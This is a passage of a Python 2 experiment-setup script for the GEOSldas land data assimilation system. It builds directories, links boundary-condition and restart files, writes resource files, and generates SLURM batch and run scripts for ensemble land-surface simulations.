self._mkdir_p(self.exphome+'/'+self.rqdExeInp['EXP_ID'])\n self._mkdir_p(self.rundir)\n self._mkdir_p(self.inpdir)\n self._mkdir_p(self.outdir)\n self._mkdir_p(self.scratchdir)\n\n #-start-shorthand-function-\n def _getDirName(outtyp, ensid, yyyymm):\n return '/'.join([\n self.outdir,\n self.rqdExeInp['EXP_DOMAIN'],\n outtyp, # ana/cat/rs/rc_out\n ensid,\n yyyymm\n ])\n #-end-shorthand-function-\n\n # met forcing dir\n myMetDir = self.inpdir + '/met_forcing'\n self._mkdir_p(myMetDir)\n\n # ensxxxx directories\n nSegments = self.nSegments\n for iseg in range(nSegments):\n _start = self.begDates[iseg]\n _end = self.endDates[iseg]\n\n # Yyyyy/Mmm between StartDateTime and EndDateTime\n newDate = _start\n y4m2_list = [('Y%4d/M%02d' % (newDate.year, newDate.month))]\n while newDate<_end:\n newDate += relativedelta(months=1)\n y4m2_list.append('Y%4d/M%02d' % (newDate.year, newDate.month))\n\n # ExpDomain/ana/, /cat/ directories\n for ensid in self.ensdirs_avg:\n for y4m2 in y4m2_list:\n self._mkdir_p(_getDirName('ana', ensid, y4m2))\n self._mkdir_p(_getDirName('cat', ensid, y4m2))\n\n # ExpDomain/rs/ directories\n for ensid in self.ensdirs:\n for y4m2 in y4m2_list:\n self._mkdir_p(_getDirName('rs', ensid, y4m2))\n\n # ExpDomain/rc_out/ - only for _start\n self._mkdir_p(_getDirName('rc_out', '', y4m2_list[0]))\n\n # restart dir\n self._mkdir_p(self.inpdir + '/restart')\n\n status = True\n return status\n\n # create link, BCs , restarts\n def createLnRstBc(self) :\n # link bld dir\n status = False\n\n _nens = self.nens\n\n os.symlink(self.blddir, self.blddirLn)\n\n # met forcing dir\n if 'MET_PATH' in self.rqdExeInp:\n metpath = self.rqdExeInp['MET_PATH'].rstrip('/')\n myMetDir = self.inpdir + '/met_forcing'\n myMetPath = myMetDir + '/' + metpath.split('/')[-1]\n os.symlink(metpath, myMetPath)\n # update 'met_path' to use relative path from outdir\n self.rqdExeInp['MET_PATH'] = os.path.relpath(myMetPath, self.rundir)\n\n # update tile file\n tile= self.rqdExeInp['TILING_FILE']\n short_tile= os.path.basename(self.rqdExeInp['TILING_FILE'])\n newtile = self.bcsdir+'/'+short_tile\n shutil.copy(tile, newtile)\n tile=newtile\n # if three extra lines exist, remove them and save it to inputdir\n\n print '\\nCorrect the tile file if it is an old EASE tile format... \\n'\n EASEtile=self.bcsdir+'/MAPL_'+short_tile\n cmd = './preprocess_ldas.x correctease '+ tile + ' '+ EASEtile \n print \"cmd: \" + cmd\n sp.call(cmd,shell=True)\n\n if os.path.isfile(EASEtile) :\n #update tile file name\n short_tile ='MAPL_'+short_tile\n tile=EASEtile \n # setup BC files\n if os.path.isfile('f2g.txt'):\n os.remove('f2g.txt')\n\n domain_def = 'LDAS_domain_def.nml'\n catchment_def = self.rqdExeInp['CATCH_DEF_FILE']\n exp_id = self.rqdExeInp['EXP_ID']\n\n _start = self.begDates[0]\n _y4m2d2h2m2 ='%4d%02d%02d%02d%02d' % (_start.year, _start.month,_start.day,_start.hour,_start.minute)\n\n dzsf = '50.0'\n if 'SURFLAY' in self.rqdExeInp :\n dzsf = self.rqdExeInp['SURFLAY']\n\n # These are dummy values for *cold* restart:\n wemin_in = '13' # WEmin input/output for scale_catch(cn),\n wemin_out = '13' # \n if 'WEMIN_IN' in self.rqdExeInp :\n wemin_in = self.rqdExeInp['WEMIN_IN']\n if 'WEMIN_OUT' in self.rqdExeInp :\n wemin_out = self.rqdExeInp['WEMIN_OUT']\n\n \n cmd = './preprocess_ldas.x c_f2g ' + tile + ' ' + domain_def + ' '+ self.out_path + ' ' + catchment_def + ' ' + exp_id + ' ' + _y4m2d2h2m2 + ' '+ dzsf\n\n print 'Creating f2g.txt....\\n'\n print \"cmd: \" + cmd\n sp.call(cmd,shell=True)\n # check if it is local or global\n with open('f2g.txt') as f2gfile :\n head=[next(f2gfile) for x in range(2)]\n if(head[0].strip() != head[1].strip()) :\n self.islocal= True\n\n # update tile domain\n if self.islocal:\n newlocalTile = tile+'.domain'\n print \"\\nCreating local tile file :\"+ newlocalTile\n print \"\\nwith land type 1100 excluded....\\n\"\n cmd = './preprocess_ldas.x c_localtile ' + tile + ' ' + newlocalTile \n print \"cmd: \" + cmd\n sp.call(cmd,shell=True)\n short_tile=short_tile +'.domain'\n tile = newlocalTile\n \n myTile=self.inpdir+'/tile.data'\n os.symlink(tile,myTile)\n\n\n bcs=[self.rqdExeInp['GRN_FILE'],\n self.rqdExeInp['LAI_FILE'],\n self.rqdExeInp['NDVI_FILE'],\n self.rqdExeInp['NIRDF_FILE'],\n self.rqdExeInp['VISDF_FILE'] ]\n bcstmp=[]\n for bcf in bcs :\n shutil.copy(bcf, self.bcsdir+'/')\n bcstmp=bcstmp+[self.bcsdir+'/'+os.path.basename(bcf)]\n bcs=bcstmp\n\n if self.islocal:\n print \"Creating the boundary files for the simulation domain...\\n\"\n bcs_tmp=[]\n for bcf in bcs :\n cmd = './preprocess_ldas.x c_localbc ' + bcf + ' '+ bcf+'.domain'\n print \"cmd: \" + cmd\n sp.call(cmd,shell=True)\n bcs_tmp=bcs_tmp+[bcf+'.domain']\n bcs=bcs_tmp\n\n\n # link BC\n print \"linking bcs...\" \n bcnames=['green','lai','ndvi','nirdf','visdf']\n for bcln,bc in zip(bcnames,bcs) :\n myBC=self.inpdir+'/'+bcln+'.data'\n os.symlink(bc,myBC)\n\n # create and link restart \n print \"Creating and lining restart...\"\n _start = self.begDates[0]\n\n y4m2='Y%4d/M%02d'%(_start.year, _start.month)\n y4m2d2_h2m2 ='%4d%02d%02d_%02d%02d' % (_start.year, _start.month,_start.day,_start.hour,_start.minute)\n\n myRstDir = self.inpdir + '/restart/'\n\n rstpath = self.rqdExeInp['RESTART_PATH']+ \\\n self.rqdExeInp['RESTART_ID'] + \\\n '/output/'+self.rqdExeInp['RESTART_DOMAIN']+'/rs/'\n rcoutpath = self.rqdExeInp['RESTART_PATH']+ \\\n self.rqdExeInp['RESTART_ID'] + \\\n '/output/'+self.rqdExeInp['RESTART_DOMAIN']+'/rc_out/'\n\n # pass into process_rst\n sponsorid = self.rqdRmInp['account']\n exp_id = self.rqdExeInp['EXP_ID']\n exp_dir = self.exphome\n bcdir = self.rqdExeInp['BCS_PATH']\n tilefile = os.path.basename(self.rqdExeInp['TILING_FILE'])\n lsmchoice = str(self.rqdExeInp['LSM_CHOICE'])\n have_rst = str(self.rqdExeInp['RESTART'])\n YYYYMMDD = '%4d%02d%02d' % (_start.year, _start.month,_start.day)\n rstid = self.rqdExeInp['RESTART_ID']\n rstdomain = self.rqdExeInp['RESTART_DOMAIN']\n rstpath0 = self.rqdExeInp['RESTART_PATH']\n \n # just copy the landassim pert seed if it exists\n for iens in range(self.nens) :\n _ensdir = self.ensdirs[iens]\n _ensid = self.ensids[iens]\n landassim_seeds = rstpath + _ensdir + '/' + y4m2+'/' + rstid + '.landassim_obspertrseed_rst.'+y4m2d2_h2m2\n if os.path.isfile(landassim_seeds) and self.assim :\n _seeds = self.rstdir + _ensdir + '/' + y4m2+'/' + exp_id + '.landassim_obspertrseed_rst.'+y4m2d2_h2m2 \n shutil.copy(landassim_seeds, _seeds)\n os.symlink(_seeds, myRstDir+ '/landassim_obspertrseed'+ _ensid +'_rst')\n self.has_landassim_seed = True\n \n cmd= ' '.join(['./process_rst.csh', sponsorid, exp_id, exp_dir,\n bcdir, tilefile, lsmchoice, have_rst, YYYYMMDD,\n rstid, rstdomain, rstpath0, str(self.nens), str(self.rqdExeInp['RUN_IRRIG']),\n dzsf, wemin_in, wemin_out])\n print \"cmd: \" + cmd\n os.system(cmd)\n\n done_rst=self.exphome+'/'+exp_id+'/mk_restarts/done_rst_file'\n print \"Please hold on for a while until the restart file is created .....\"\n _animation = \"|/-\\\\\"\n _idx = 0\n while not os.path.isfile(done_rst):\n sys.stdout.write('\\r'+_animation[_idx % len(_animation)])\n sys.stdout.flush()\n _idx += 1\n time.sleep(1.)\n\n\n #for ens in self.ensdirs :\n catchRstFile0 = ''\n vegdynRstFile0 = ''\n for iens in range(self.nens) :\n ens = self.ensdirs[iens]\n ensid = self.ensids[iens]\n myCatchRst = myRstDir+'/'+self.catch +ensid +'_internal_rst'\n myVegRst = myRstDir+'/'+'vegdyn'+ensid +'_internal_rst'\n myPertRst = myRstDir+'/'+ 'landpert' +ensid +'_internal_rst'\n\n catchRstFile = ''\n vegdynRstFile = ''\n pertRstFile = ''\n print \"restart: \" + self.rqdExeInp['RESTART']\n if self.rqdExeInp['RESTART'].isdigit() :\n if int(self.rqdExeInp['RESTART']) == 0 or int(self.rqdExeInp['RESTART']) == 2 :\n vegdynRstFile = glob.glob(self.rqdExeInp['BCS_PATH']+'vegdyn_*.dat')[0]\n catchRstFile = self.exphome+'/'+exp_id+'/mk_restarts/'+self.catch+'_internal_rst.'+YYYYMMDD\n else :\n catchRstFile = rstpath+ens +'/'+ y4m2+'/'+self.rqdExeInp['RESTART_ID']+'.'+self.catch+'_internal_rst.'+y4m2d2_h2m2\n _catchRstFile = self.exphome+'/'+exp_id+'/mk_restarts/'+self.catch+ensid+'_internal_rst.'+YYYYMMDD\n vegdynRstFile= rstpath+ens +'/'+self.rqdExeInp['RESTART_ID']+ '.vegdyn_internal_rst'\n if not os.path.isfile(vegdynRstFile): # no vegdyn restart from LDASsa\n vegdynRstFile = glob.glob(self.rqdExeInp['BCS_PATH']+'vegdyn_*.dat')[0]\n if (self.nens == 1) :\n _catchRstFile = self.exphome+'/'+exp_id+'/mk_restarts/'+self.catch+'0000_internal_rst.'+YYYYMMDD\n if os.path.isfile(_catchRstFile): # from LDASsa restart\n catchRstFile = _catchRstFile\n assert int(self.rqdExeInp['RST_FROM_GLOBAL']) == 1, 'restart from LDASsa should be global'\n else :\n vegdynRstFile = glob.glob(self.rqdExeInp['BCS_PATH']+'vegdyn_*.dat')[0]\n catchRstFile = self.exphome+'/'+exp_id+'/mk_restarts/'+self.catch+'_internal_rst.'+YYYYMMDD\n\n # catchment restart file\n print 'catchRstFile: ' + catchRstFile\n if os.path.isfile(catchRstFile) :\n\n catchLocal = self.rstdir+ens +'/'+ y4m2+'/'+self.rqdExeInp['EXP_ID']+'.'+self.catch+'_internal_rst.'+y4m2d2_h2m2\n if self.islocal :\n print \"Creating local catchment restart file... \\n\"\n cmd='./preprocess_ldas.x c_localcatchrst '+ catchRstFile +' ' + catchLocal \n print \"cmd: \"+cmd\n sp.call(cmd,shell=True)\n else :\n shutil.copy(catchRstFile,catchLocal)\n\n catchRstFile = catchLocal\n\n if '0000' in ens :\n catchRstFile0 = catchRstFile\n else : \n catchRstFile = catchRstFile0\n\n # vegdyn restart file\n if os.path.isfile(vegdynRstFile) :\n\n vegdynLocal = self.rstdir+ens +'/'+self.rqdExeInp['EXP_ID']+'.vegdyn_internal_rst'\n if self.islocal :\n print \"Creating the local veg restart file... \\n\"\n cmd='./preprocess_ldas.x c_localvegrst '+ vegdynRstFile +' ' + vegdynLocal \n print \"cmd: \" + cmd\n sp.call(cmd,shell=True)\n else :\n shutil.copy(vegdynRstFile,vegdynLocal)\n\n vegdynRstFile = vegdynLocal\n\n if '0000' in ens :\n vegdynRstFile0 = vegdynRstFile\n else : \n vegdynRstFile = vegdynRstFile0\n\n if (self.has_geos_pert and self.perturb == 1) :\n pertRstFile = rstpath+ens +'/'+ y4m2+'/'+self.rqdExeInp['RESTART_ID']+'.landpert_internal_rst.'+y4m2d2_h2m2\n pertLocal = self.rstdir+ens +'/'+ y4m2+'/'+self.rqdExeInp['EXP_ID']+'.landpert_internal_rst.'+y4m2d2_h2m2\n shutil.copy(pertRstFile,pertLocal)\n pertRstFile = pertLocal\n\n if (self.has_ldassa_pert and self.perturb == 1 ) :\n pertRstFile = rstpath+ens +'/'+ y4m2+'/'+self.rqdExeInp['RESTART_ID']+'.'+ens+'.pert_ldas_rst.'+y4m2d2_h2m2+'z.bin'\n pertLocal = self.rstdir+ens +'/'+ y4m2+'/'+self.rqdExeInp['EXP_ID']+'.landpert_internal_rst.'+y4m2d2_h2m2\n print \"Convert LDASsa pert \" + ensid + \" rst to GEOSldas rst\"\n cmd = './preprocess_ldas.x c_convert_pert '+ pertRstFile + ' ' + pertLocal + ' ' + self.out_path + ' ' + self.rqdExeInp['EXP_ID'] \n sp.call(cmd,shell=True)\n pertRstFile = pertLocal\n\n print 'catchRstFile: ' + catchRstFile\n\n os.symlink(catchRstFile, myCatchRst)\n os.symlink(vegdynRstFile, myVegRst)\n if ( (self.has_geos_pert or self.has_ldassa_pert) and self.perturb == 1 ):\n os.symlink(pertRstFile, myPertRst)\n\n # catch_param restar file\n catch_param_file = self.bcsdir+'/'+ y4m2+'/'+self.rqdExeInp['EXP_ID']+'.ldas_catparam.'+y4m2d2_h2m2+'z.bin'\n assert os.path.isfile(catch_param_file), \"need catch_param file %s\" % catch_param_file\n\n if self.has_mwrtm :\n mwRTMRstFile = self.rqdExeInp['MWRTM_FILE']\n mwRTMLocal = self.bcsdir+'/'+ y4m2+'/'+self.rqdExeInp['EXP_ID']+'.ldas_mwRTMparam.'+y4m2d2_h2m2+'z.nc4'\n if self.islocal :\n print \"Creating the local mwRTM restart file... \\n\"\n cmd='./preprocess_ldas.x c_localmwrtmrst '+ mwRTMRstFile +' ' + mwRTMLocal \n print \"cmd: \" + cmd\n sp.call(cmd,shell=True)\n else :\n shutil.copy(mwRTMRstFile,mwRTMLocal)\n\n mwRTMRstFile = mwRTMLocal\n mymwRTMRst = myRstDir+'/mwrtm_param_rst'\n os.symlink(mwRTMRstFile, mymwRTMRst)\n\n # update 'restart_path' to use relative path from outdir\n print \"Updating restart path...\"\n self.rqdExeInp['RESTART_PATH'] = myRstDir\n if os.path.isfile('f2g.txt'):\n os.remove('f2g.txt')\n \n status = True\n return status\n\n def createRCFiles(self):\n \"\"\"\n (1) get resource files form DEFAULT rc files from /etc\n (2) update from customed rc files\n (2) write rc files to the run directory\n \"\"\"\n\n status = False\n\n for mydir in [self.blddirLn, self.rundir]:\n assert os.path.isdir(mydir), \\\n 'dir [%s] does not exist!' % mydir\n\n # first copy ldsetup input files to rundir\n # if a file w/ the same name already exists at rundir\n # append 1,2,3 etc, to the filename\n ## exe inp file\n exefilename = self.exeinpfile.rstrip('/').split('/')[-1]\n newfilename = exefilename\n _nens = self.nens\n ctr = 0\n while os.path.isfile(self.rundir+'/'+newfilename):\n ctr += 1\n newfilename = exefilename + '.%d' % ctr\n shutil.copy(self.exeinpfile, self.rundir+'/'+newfilename)\n ## bat inp file\n batfilename = self.batinpfile.rstrip('/').split('/')[-1]\n newfilename = batfilename\n ctr = 0\n while os.path.isfile(self.rundir+'/'+newfilename):\n ctr += 1\n newfilename = batfilename + '.%d' % ctr\n shutil.copy(self.batinpfile, self.rundir+'/'+newfilename)\n\n etcdir = self.blddirLn + '/etc'\n\n #defalt nml\n default_nml = glob.glob(etcdir+'/LDASsa_DEFAULT_inputs_*.nml')\n for nmlfile in default_nml:\n shortfile=self.rundir+'/'+nmlfile.split('/')[-1]\n shutil.copy2(nmlfile, shortfile)\n # special nml\n special_nml=[]\n if 'NML_INPUT_PATH' in self.rqdExeInp :\n special_nml = glob.glob(self.rqdExeInp['NML_INPUT_PATH']+'/LDASsa_SPECIAL_inputs_*.nml')\n for nmlfile in special_nml:\n shortfile=nmlfile.split('/')[-1]\n shutil.copy2(nmlfile, self.rundir+'/'+shortfile)\n\n # get optimzed NX and IMS\n if os.path.isfile('optimized_distribution'):\n os.remove('optimized_distribution')\n \n print \"Optimizing... decomposition of processes.... \\n\"\n cmd = './preprocess_ldas.x optimize '+ self.inpdir+'/tile.data '+ str(self.rqdRmInp['ntasks'])\n print \"cmd: \" + cmd\n sp.call(cmd,shell=True)\n optinxny=self._parseInputFile('optimized_distribution')\n if (int(optinxny['NX']) == 1):\n if int(optinxny['NY']) != int(self.rqdRmInp['ntasks']):\n self.rqdRmInp['ntasks']=optinxny['NY']\n print 'adjust ntasks %d for cubed-sphere grid' % int(self.rqdRmInp['ntasks'])\n \n if os.path.isfile('IMS.rc') :\n shutil.move('IMS.rc', self.rundir+'/')\n if os.path.isfile('JMS.rc') :\n shutil.move('JMS.rc', self.rundir+'/')\n \n os.remove('optimized_distribution')\n\n # DEFAULT rc files\n default_rc = glob.glob(etcdir+'/GEOSldas_*.rc')\n assert len(default_rc)==4\n print default_rc\n for rcfile in default_rc:\n shortfile=rcfile.rsplit('GEOSldas_',1)[1]\n print shortfile + ' ' + etcdir + ' ' + self.rundir\n if shortfile =='HIST.rc':\n tmprcfile=self.rundir+'/HISTORY.rc'\n histrc_file=rcfile\n\n _file_found = False\n if 'HISTRC_FILE' in self.rqdExeInp :\n _tmpfile = self.rqdExeInp['HISTRC_FILE'].replace(\"'\",'').replace('\"','')\n if(os.path.isfile(_tmpfile)) :\n _file_found = True\n else :\n assert not _tmpfile.strip(), \"HISTRC_FILE: %s is NOT a file. \" %_tmpfile\n\n if _file_found :\n histrc_file = self.rqdExeInp['HISTRC_FILE']\n shutil.copy2(histrc_file,tmprcfile)\n else :\n shutil.copy2(histrc_file,tmprcfile)\n GRID='EASE ' + self.rqdExeInp['GRIDNAME'] + ' ' +tmprcfile\n if '-CF' in self.rqdExeInp['GRIDNAME'] :\n GRID ='CUBE ' + self.rqdExeInp['GRIDNAME'] + ' ' +tmprcfile\n _assim = '1' if self.assim else '0'\n cmd ='./process_hist.csh '+ str(self.rqdExeInp['LSM_CHOICE']) + ' ' + str(self.rqdExeInp['AEROSOL_DEPOSITION']) + \\\n ' ' + GRID + ' ' + str(self.rqdExeInp['RUN_IRRIG']) + ' ' + _assim + ' '+ str(self.nens)\n print(cmd)\n os.system(cmd)\n #sp.call(cmd) \n for line in fileinput.input(tmprcfile,inplace=True):\n print line.rstrip().replace('GEOSldas_expid',self.rqdExeInp['EXP_ID'])\n # just copy an empty ExtData.rc\n if shortfile=='ExtData.rc' :\n shutil.copy2(rcfile, self.rundir+'/'+shortfile)\n \n if shortfile == 'CAP.rc': \n tmprcfile = self.rundir+'/CAP.rc'\n shutil.copy2(rcfile,tmprcfile)\n \n _num_sgmt = int(self.rqdExeInp['NUM_SGMT'])\n\n for line in fileinput.input(tmprcfile,inplace=True):\n print line.rstrip().replace('JOB_SGMT:',self.job_sgmt[0])\n for line in fileinput.input(tmprcfile,inplace=True):\n print line.rstrip().replace('NUM_SGMT:','NUM_SGMT: %d'% _num_sgmt)\n for line in fileinput.input(tmprcfile,inplace=True):\n print line.rstrip().replace('BEG_DATE:',self.begDates[0].strftime('BEG_DATE: %Y%m%d %H%M%S'))\n for line in fileinput.input(tmprcfile,inplace=True):\n print line.rstrip().replace('END_DATE:',self.endDates[-1].strftime('END_DATE: %Y%m%d %H%M%S'))\n \n if shortfile == 'LDAS.rc' :\n ldasrcInp = OrderedDict()\n # land default \n default_surfrcInp = self._parseInputFile(etcdir+'/GEOS_SurfaceGridComp.rc')\n for key,val in default_surfrcInp.iteritems() :\n ldasrcInp[key] = val\n\n # ldas default, may overwrite land default \n default_ldasrcInp = self._parseInputFile(rcfile)\n for key,val in default_ldasrcInp.iteritems() :\n ldasrcInp[key] = val\n\n # exeinp, may overwrite ldas default\n for key,val in self.rqdExeInp.iteritems():\n if key not in self.NoneLDASrcKeys:\n ldasrcInp[key]= val\n\n # overide by optimized distribution\n #for key,val in optinxny.iteritems():\n # ldasrcInp[key]= val\n\n # create BC in rc file\n tmpl_ = ''\n if self.nens >1 :\n tmpl_='%s' \n if self.perturb == 1:\n ldasrcInp['PERTURBATIONS'] ='1'\n bcval=['../input/green','../input/lai','../input/ndvi','../input/nirdf','../input/visdf']\n bckey=['GREEN','LAI','NDVI','NIRDF','VISDF']\n for key, val in zip(bckey,bcval):\n keyn = key+'_FILE'\n valn = val+'.data'\n ldasrcInp[keyn]= valn\n\n # create restart item in RC\n catch_ = self.catch.upper()\n if catch_+'_INTERNAL_RESTART_TYPE' in ldasrcInp :\n # avoid duplicate\n del ldasrcInp[ catch_ +'_INTERNAL_RESTART_TYPE']\n if catch_+'_INTERNAL_CHECKPOINT_TYPE' in ldasrcInp :\n # avoid duplicate\n del ldasrcInp[ catch_ +'_INTERNAL_CHECKPOINT_TYPE']\n if 'VEGDYN_INTERNAL_RESTART_TYPE' in ldasrcInp :\n # avoid duplicate\n del ldasrcInp['VEGDYN_INTERNAL_RESTART_TYPE']\n \n rstkey=[catch_,'VEGDYN']\n rstval=[self.catch,'vegdyn']\n if((self.has_ldassa_pert or self.has_geos_pert) and self.perturb == 1) :\n rstkey=[catch_,'VEGDYN','LANDPERT']\n rstval=[self.catch,'vegdyn','landpert']\n\n if self.has_mwrtm : # and _assim ==1 :\n keyn='LANDASSIM_INTERNAL_RESTART_FILE'\n valn='../input/restart/mwrtm_param_rst'\n ldasrcInp[keyn]= valn\n\n if self.nens > 1 :\n keyn='ENS_ID_WIDTH'\n valn='4'\n ldasrcInp[keyn]= valn\n\n if self.has_landassim_seed and self.assim :\n keyn='LANDASSIM_OBSPERTRSEED_RESTART_FILE'\n valn='../input/restart/landassim_obspertrseed'+tmpl_+'_rst'\n ldasrcInp[keyn]= valn\n\n if self.assim: \n keyn='LANDASSIM_OBSPERTRSEED_CHECKPOINT_FILE'\n valn='landassim_obspertrseed'+tmpl_+'_checkpoint'\n ldasrcInp[keyn]= valn\n \n for key,val in zip(rstkey,rstval) :\n keyn = key+ '_INTERNAL_RESTART_FILE'\n valn = '../input/restart/'+val+tmpl_+'_internal_rst'\n ldasrcInp[keyn]= valn\n \n # checkpoint file and its type\n keyn = catch_ + '_INTERNAL_CHECKPOINT_FILE'\n valn = self.catch+tmpl_+'_internal_checkpoint'\n ldasrcInp[keyn]= valn\n\n # for lat/lon and EASE tile space, specify LANDPERT checkpoint file here (via MAPL);\n # for cube-sphere tile space, Landpert GC will set up LANDPERT checkpoint file \n if('-CF' not in self.rqdExeInp['GRIDNAME'] and self.perturb == 1):\n keyn = 'LANDPERT_INTERNAL_CHECKPOINT_FILE'\n valn = 'landpert'+tmpl_+'_internal_checkpoint'\n ldasrcInp[keyn]= valn\n \n \n # write LDAS.rc\n fout =open(self.rundir+'/'+shortfile,'w')\n # ldasrcInp['NUM_LDAS_ENSEMBLE']=ldasrcInp.pop('NUM_ENSEMBLE')\n for key,val in optinxny.iteritems():\n keyn=(key+\":\").ljust(36)\n fout.write(keyn+str(val)+'\\n')\n for key,val in ldasrcInp.iteritems() :\n keyn=(key+\":\").ljust(36)\n fout.write(keyn+str(val)+'\\n')\n fout.write(\"OUT_PATH:\".ljust(36)+self.out_path+'\\n')\n fout.write(\"EXP_ID:\".ljust(36)+self.rqdExeInp['EXP_ID']+'\\n')\n fout.write(\"TILING_FILE:\".ljust(36)+\"../input/tile.data\\n\")\n\n fout.close() \n\n fout=open(self.rundir+'/'+'cap_restart','w') \n #fout.write(self.rqdExeInp['BEG_DATE'])\n fout.write(self.begDates[0].strftime('%Y%m%d %H%M%S'))\n fout.close()\n status=True\n return status\n\n def _getRMdirectives(self, start):\n\n _rm_name = self.rqdRmInp['rm_name']\n expid = self.rqdExeInp['EXP_ID']\n if _rm_name=='SLURM':\n directives = ''\n # REQUIRED directives account/time/ntasks\n directives += '#SBATCH --account=%s\\n' % self.rqdRmInp['account']\n directives += '#SBATCH --time=%s\\n' % self.rqdRmInp['walltime']\n directives += '#SBATCH --ntasks=%s\\n' % self.rqdRmInp['ntasks']\n # OPTIONAL directives\n for key, val in self.optRmInp.iteritems():\n directives += '#SBATCH --%s=%s\\n' % (key, val)\n # out/err files in rc_out\n myDateTime = '%04d%02d%02d_%02d%02dz' % \\\n (start.year, start.month, start.day,start.hour,start.minute)\n outfile = os.path.relpath(\n '/'.join([\n self.outdir,\n self.rqdExeInp['EXP_DOMAIN'],\n 'rc_out',\n 'Y%04d' % start.year,\n 'M%02d' % start.month,\n '.'.join([expid, 'ldas_log', myDateTime, 'txt']),\n ]),\n self.rundir)\n errfile = os.path.relpath(\n '/'.join([\n self.outdir,\n self.rqdExeInp['EXP_DOMAIN'],\n 'rc_out',\n 'Y%04d' % start.year,\n 'M%02d' % start.month,\n '.'.join([expid, 'ldas_err', myDateTime, 'txt']),\n ]),\n self.rundir)\n directives += '#SBATCH --output=%s\\n' % outfile\n directives += '#SBATCH --error=%s\\n' % errfile\n else:\n raise Exception\n \n return directives\n\n\n def createBatchRun(self):\n \"\"\"\n \"\"\"\n\n status = False\n\n rm_name = self.rqdRmInp['rm_name'].lower()\n os.chdir(self.rundir)\n fout =open(self.rundir+'/ldas_batchrun.j','w')\n fout.write(\"#!/bin/bash -f\\n\")\n jobid = None\n expid = self.rqdExeInp['EXP_ID']\n fout.write(\"\\nsed -i 's/if($capdate<$enddate) sbatch /#if($capdate<$enddate) sbatch /g' lenkf.j\\n\\n\")\n nSegments = self.nSegments\n for iseg in range(nSegments):\n if iseg ==0 :\n fout.write(\"jobid%d=$(echo $(sbatch lenkf.j) | cut -d' ' -f 4)\\n\"%(iseg))\n fout.write(\"echo $jobid%d\\n\"%iseg )\n else :\n _start = self.begDates[iseg]\n myDateTime = '%04d%02d%02d_%02d%02dz' % \\\n (_start.year, _start.month, _start.day,_start.hour,_start.minute)\n _logfile = os.path.relpath(\n '/'.join([\n self.outdir,\n self.rqdExeInp['EXP_DOMAIN'],\n 'rc_out',\n 'Y%04d' % _start.year,\n 'M%02d' % _start.month,\n '.'.join([expid, 'ldas_log', myDateTime, 'txt']),\n ]),\n self.rundir)\n _errfile = os.path.relpath(\n '/'.join([\n self.outdir,\n self.rqdExeInp['EXP_DOMAIN'],\n 'rc_out',\n 'Y%04d' % _start.year,\n 'M%02d' % _start.month,\n '.'.join([expid, 'ldas_err', myDateTime, 'txt']),\n ]),\n self.rundir)\n\n #fout.write(\"jobid%d=$(echo $(sbatch --dependency=afterany:$jobid%d --output=%s --error=%s lenkf.j) | cut -d' ' -f 4)\\n\"%(iseg,iseg-1,_logfile, _errfile))\n fout.write(\"jobid%d=$(echo $(sbatch --dependency=afterok:$jobid%d lenkf.j) | cut -d' ' -f 4)\\n\"%(iseg,iseg-1))\n fout.write(\"echo $jobid%d\\n\"%iseg )\n fout.write(\"\\nsed -i 's/#if($capdate<$enddate) sbatch/if($capdate<$enddate) sbatch /g' lenkf.j\")\n fout.close()\n\n os.chmod(self.rundir+'/ldas_batchrun.j', 0755) \n status = True\n return status\n\n\n def createRunScripts(self):\n \"\"\"\n \"\"\"\n\n status = False\n\n rm_name = self.rqdRmInp['rm_name'].lower()\n os.chdir(self.rundir)\n lenkf=self.blddir+'/etc/lenkf.j.template'\n shutil.copy(lenkf,'lenkf.j')\n\n my_qos='allnccs'\n if 'qos' in self.optRmInp :\n my_qos = self.optRmInp['qos']\n\n my_job=self.rqdExeInp['EXP_ID']\n if 'job_name' in self.optRmInp :\n my_job = self.optRmInp['job_name']\n\n my_constraint=''\n if 'constraint' in self.optRmInp :\n my_constraint = self.optRmInp['constraint']\n\n start = self.begDates[0]\n expid = self.rqdExeInp['EXP_ID']\n myDateTime = '%04d%02d%02d_%02d%02dz' % \\\n (start.year, start.month, start.day,start.hour,start.minute)\n my_logfile = os.path.relpath(\n '/'.join([\n self.outdir,\n self.rqdExeInp['EXP_DOMAIN'],\n 'rc_out',\n 'Y%04d' % start.year,\n 'M%02d' % start.month,\n '.'.join([expid, 'ldas_log', myDateTime, 'txt']),\n ]),\n self.rundir)\n my_errfile = os.path.relpath(\n '/'.join([\n self.outdir,\n self.rqdExeInp['EXP_DOMAIN'],\n 'rc_out',\n 'Y%04d' % start.year,\n 'M%02d' % start.month,\n '.'.join([expid, 'ldas_err', myDateTime, 'txt']),\n ]),\n self.rundir)\n with open(lenkf,'rt') as fin:\n with open('lenkf.j','wt') as fout :\n for line in fin :\n if 'MY_ACCOUNT' in line :\n fout.write(line.replace('MY_ACCOUNT',self.rqdRmInp['account']))\n elif 'MY_WALLTIME' in line :\n fout.write(line.replace('MY_WALLTIME',self.rqdRmInp['walltime']))\n elif 'MY_NTASKS' in line :\n fout.write(line.replace('MY_NTASKS',str(self.rqdRmInp['ntasks'])))\n elif 'MY_QOS' in line :\n if 'allnccs' not in my_qos:\n fout.write(line.replace('MY_QOS',my_qos))\n elif 'MY_JOB' in line :\n fout.write(line.replace('MY_JOB',my_job))\n elif 'MY_CONS' in line :\n if my_constraint!='' :\n fout.write(line.replace('MY_CONS',my_constraint))\n elif 'MY_EXPID' in line :\n fout.write(line.replace('MY_EXPID',self.rqdExeInp['EXP_ID']))\n elif 'MY_EXPDOMAIN' in line :\n fout.write(line.replace('MY_EXPDOMAIN',self.rqdExeInp['EXP_DOMAIN']))\n elif 'MY_ENSEMBLE' in line :\n fout.write(line.replace('MY_ENSEMBLE',str(self.rqdExeInp['NUM_LDAS_ENSEMBLE'])))\n elif 'MY_LOGFILE' in line :\n fout.write(line.replace('MY_LOGFILE',my_logfile))\n elif 'MY_ERRFILE' in line :\n fout.write(line.replace('MY_ERRFILE',my_errfile))\n elif 'MY_MODEL' in line :\n fout.write(line.replace('MY_MODEL',self.catch))\n elif 'MY_POSTPROC_HIST' in line :\n fout.write(line.replace('MY_POSTPROC_HIST',str(self.rqdExeInp['POSTPROC_HIST']))) \n elif 'MY_FIRST_ENS_ID' in line :\n fout.write(line.replace('MY_FIRST_ENS_ID',str(self.first_ens_id))) \n else :\n fout.write(line.replace('MY_EXPDIR',self.exphome+'/$EXPID'))\n \n os.chmod('lenkf.j', 0755) \n\n expdir = '/'.join(self.rundir.rstrip('/').split('/')[:-1])\n print '\\nExperiment directory: %s' % expdir\n print\n status = True\n return status\n\ndef _printdict(d):\n \"\"\"\n Private method: print a 'flat' 